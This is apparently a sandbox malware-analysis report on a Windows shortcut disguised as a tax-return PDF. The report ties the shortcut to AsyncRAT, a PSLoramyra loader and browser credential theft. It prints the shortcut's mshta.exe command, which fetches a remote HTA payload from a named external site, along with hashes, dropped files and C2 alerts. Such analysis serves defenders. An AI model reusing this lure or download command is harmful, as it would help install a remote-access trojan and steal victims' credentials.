File name:	Retum off Organization Exempt From Income Tax.pdf Adobe Acrobat Document.lnk
Full analysis:	https://app.any.run/tasks/e72bda57-1f6a-46d4-be4b-def567b23676
Verdict:	Malicious activity
Threats:	AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	February 19, 2025, 17:35:46
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	psloramyra loader asyncrat rat remote stealer
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Unicoded, HasExpIcon "%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe", MachineID win-us3ihpa0nq6, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Sat May 8 08:14:46 2021, atime=Sat May 8 08:14:46 2021, mtime=Sat May 8 08:14:46 2021, length=32768, window=normal, IDListSize 0x013b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\mshta.exe"
MD5:	5C0BB364C434072C26B47A41521877AF
SHA1:	90DAEF14275695CFC24529465B5B5EC1E03E8A5D
SHA256:	E2FE3A262F19DFA345DF2C5DC20FA9C7AD7B8D3A1E229FD2ADF8AD67A4C83A7E
SSDEEP:	48:8FyCQUd8YdTBdTBdTBdTBdTBdTBdTCdTbJ8dJd3QUBB6mELBk8ZIRC3zaP/Jmz8i:8FtQtXudgy/iB9ZRzi/JmIQ

Flags:	IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpIcon, TargetMetadata
FileAttributes:	Archive
CreateDate:	2021:05:08 08:14:46+00:00
AccessDate:	2021:05:08 08:14:46+00:00
ModifyDate:	2021:05:08 08:14:46+00:00
TargetFileSize:	32768
IconIndex:	1
RunWindow:	Normal
HotKey:	(none)
TargetFileDOSName:	mshta.exe
DriveType:	Fixed Disk
DriveSerialNumber:	C48A-6DA4
VolumeLabel:	-
LocalBasePath:	C:\Windows\System32\mshta.exe
Description:	C:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media PlayerC:\Program Files\Windows Media Player
RelativePath:	..\..\Windows\System32\mshta.exe
WorkingDirectory:	C:\Program Files\Windows Media Player
CommandLineArguments:	"https://casalomaminca.com/wp-content/uploads/2025/02/smbhta.html"
IconFileName:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
MachineID:	win-us3ihpa0nq6


(PID) Process:	(6480) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(6480) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(6480) mshta.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(6892) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:	write	Name:	VBSFile
Value:

PID	Process	Filename		Type
6892	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AMJ3EXZFZ3BMZ2FTF7NM.temp		binary
		MD5:7736C0ABE626C1CE7F2D273745797655	SHA256:755C5C1084078A374B012CE404360C6F43DE1A1F6505D3CC80DEA246BF158D47
6892	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms		binary
		MD5:7736C0ABE626C1CE7F2D273745797655	SHA256:755C5C1084078A374B012CE404360C6F43DE1A1F6505D3CC80DEA246BF158D47
6480	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D8BFCD35BA770A2050808D5BC8E612B8		binary
		MD5:356AEF2D5D0C34F0F70E668A1B7D0976	SHA256:4FD59E8ABDAF9B74DA2EE329AD9334027FE2970994CFE2DF8C05C2AB267ECA80
6480	mshta.exe	C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_34D61B4A2A4AE0D3DDAB879224BCA77B		binary
		MD5:F34AEF38220729E7E324FDB6EA88A339	SHA256:53429CF03D8ED22A6033FDB31A5604EE033D41FEE7E3CDA81A89F480CC6D11D5
6892	powershell.exe	C:\Users\Public\1xx.txt		text
		MD5:14C2A6B7BF15E15D8DAE9CD4A56432D5	SHA256:79891821778C4CA9358C27E7FB66B0442A2921B661DF1293E398B18D81DA5D96
6480	mshta.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\smbhta[1].htm		html
		MD5:A05117F1946C6D5BD5916BB03FB47656	SHA256:6AC08037B3B0E3C162760DC157333F78C1D5EDCB8791387FF7E7D3D5C0D90142
6892	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF136024.TMP		binary
		MD5:D040F64E9E7A2BB91ABCA5613424598E	SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6892	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_43ifmorh.vfb.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6892	powershell.exe	C:\Users\Public\1tron.vbs		text
		MD5:7F5C4C3F7B7683A4AC2C1CCFB3C7C237	SHA256:AB664EC706919BD7AAA887B817480B8D253E653E4715D52E46C19992583244D7
6892	powershell.exe	C:\Users\Public\1Execute.txt		text
		MD5:529CF04DB0F736467C7583EA80C3AA66	SHA256:67642E56281BC4AA846689BC725F8FCC76E61C20831AA4F7E2E0C8CDBA17E520

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	2.19.11.120:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
5064	SearchApp.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
—	—	GET	200	23.209.214.100:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
1176	svchost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6480	mshta.exe	GET	200	172.64.149.23:80	http://zerossl.ocsp.sectigo.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQILj%2F5BYz%2BinwYvRPv3x0WYHB6awQUyNl4aKLZGWjVPXLeXwo%2B3LWGhqYCEAm7VH5wnOhTEOmw6FjsbLg%3D	unknown	—	—	whitelisted
6480	mshta.exe	GET	200	172.64.149.23:80	http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEGxVq9vQB5LHnQcM2BGe1r8%3D	unknown	—	—	whitelisted
6264	SIHClient.exe	GET	200	23.209.214.100:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
6264	SIHClient.exe	GET	200	23.209.214.100:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6152	backgroundTaskHost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D	unknown	—	—	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
—	—	2.19.11.120:80	crl.microsoft.com	Elisa Oyj	NL	whitelisted
—	—	23.209.214.100:80	www.microsoft.com	PT. Telekomunikasi Selular	ID	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
5064	SearchApp.exe	95.101.79.113:443	www.bing.com	Akamai International B.V.	NL	whitelisted
1176	svchost.exe	40.126.31.3:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
5064	SearchApp.exe	2.23.77.188:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
1176	svchost.exe	2.23.77.188:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
6480	mshta.exe	208.109.203.43:443	casalomaminca.com	GO-DADDY-COM-LLC	US	unknown

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208 40.127.240.158	whitelisted
crl.microsoft.com	2.19.11.120 2.19.11.105	whitelisted
www.microsoft.com	23.209.214.100	whitelisted
google.com	216.58.206.46	whitelisted
www.bing.com	95.101.79.113 95.101.79.114 95.101.79.91 95.101.79.97 95.101.79.99 95.101.79.90 95.101.79.105 95.101.79.81 95.101.79.88	whitelisted
login.live.com	40.126.31.3 20.190.159.4 20.190.159.68 20.190.159.73 40.126.31.2 40.126.31.130 40.126.31.73 20.190.159.64	whitelisted
ocsp.digicert.com	2.23.77.188	whitelisted
casalomaminca.com	208.109.203.43	unknown
ocsp.usertrust.com	172.64.149.23 104.18.38.233	whitelisted
zerossl.ocsp.sectigo.com	172.64.149.23 104.18.38.233	whitelisted

PID	Process	Class	Message
6480	mshta.exe	Misc activity	ET INFO Observed ZeroSSL SSL/TLS Certificate
6892	powershell.exe	Misc activity	ET INFO Observed ZeroSSL SSL/TLS Certificate
—	—	Potentially Bad Traffic	ET DYN_DNS DNS Query to DynDNS Domain *.ddns .net
2192	svchost.exe	Potentially Bad Traffic	ET DYN_DNS DYNAMIC_DNS Query to a *.accesscam .org Domain
836	aspnet_regbrowsers.exe	Domain Observed Used for C2 Detected	REMOTE [ANY.RUN] AsyncRAT SSL certificate
836	aspnet_regbrowsers.exe	Domain Observed Used for C2 Detected	ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
836	aspnet_regbrowsers.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
836	aspnet_regbrowsers.exe	Malware Command and Control Activity Detected	REMOTE [ANY.RUN] AsyncRAT Successful Connection

General Info

Retum off Organization Exempt From Income Tax.pdf Adobe Acrobat Document.lnk

5C0BB364C434072C26B47A41521877AF

90DAEF14275695CFC24529465B5B5EC1E03E8A5D

E2FE3A262F19DFA345DF2C5DC20FA9C7AD7B8D3A1E229FD2ADF8AD67A4C83A7E

48:8FyCQUd8YdTBdTBdTBdTBdTBdTBdTCdTbJ8dJd3QUBB6mELBk8ZIRC3zaP/Jmz8i:8FtQtXudgy/iB9ZRzi/JmIQ

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes powershell execution policy (Bypass)

Bypass execution policy to execute commands

Run PowerShell with an invisible window

PSLORAMYRA has been detected

ASYNCRAT has been detected (MUTEX)

ASYNCRAT has been detected (YARA)

Steals credentials from Web Browsers

ASYNCRAT has been detected (SURICATA)

Actions looks like stealing of personal data

SUSPICIOUS

Starts CMD.EXE for commands execution

Executes script without checking the security policy

Starts POWERSHELL.EXE for commands execution

Likely accesses (executes) a file from the Public directory

Executing commands from a ".bat" file

The process executes VB scripts

The process bypasses the loading of PowerShell profile settings

The process executes Powershell scripts

Converts a specified value to an integer (POWERSHELL)

Runs shell command (SCRIPT)

Converts a specified value to a byte (POWERSHELL)

Connects to unusual port

Contacting a server suspected of hosting an CnC

INFO

Reads Internet Explorer settings

Checks proxy server information

Disables trace logs

Checks transactions between databases Windows and Oracle

Script raised an exception (POWERSHELL)

Uses string replace method (POWERSHELL)

Gets data length (POWERSHELL)

Converts byte array into ASCII string (POWERSHELL)

Reads the machine GUID from the registry

Checks supported languages

Reads the computer name

Reads the software policy settings

Malware configuration

AsyncRat

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Malware configuration

AsyncRat

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information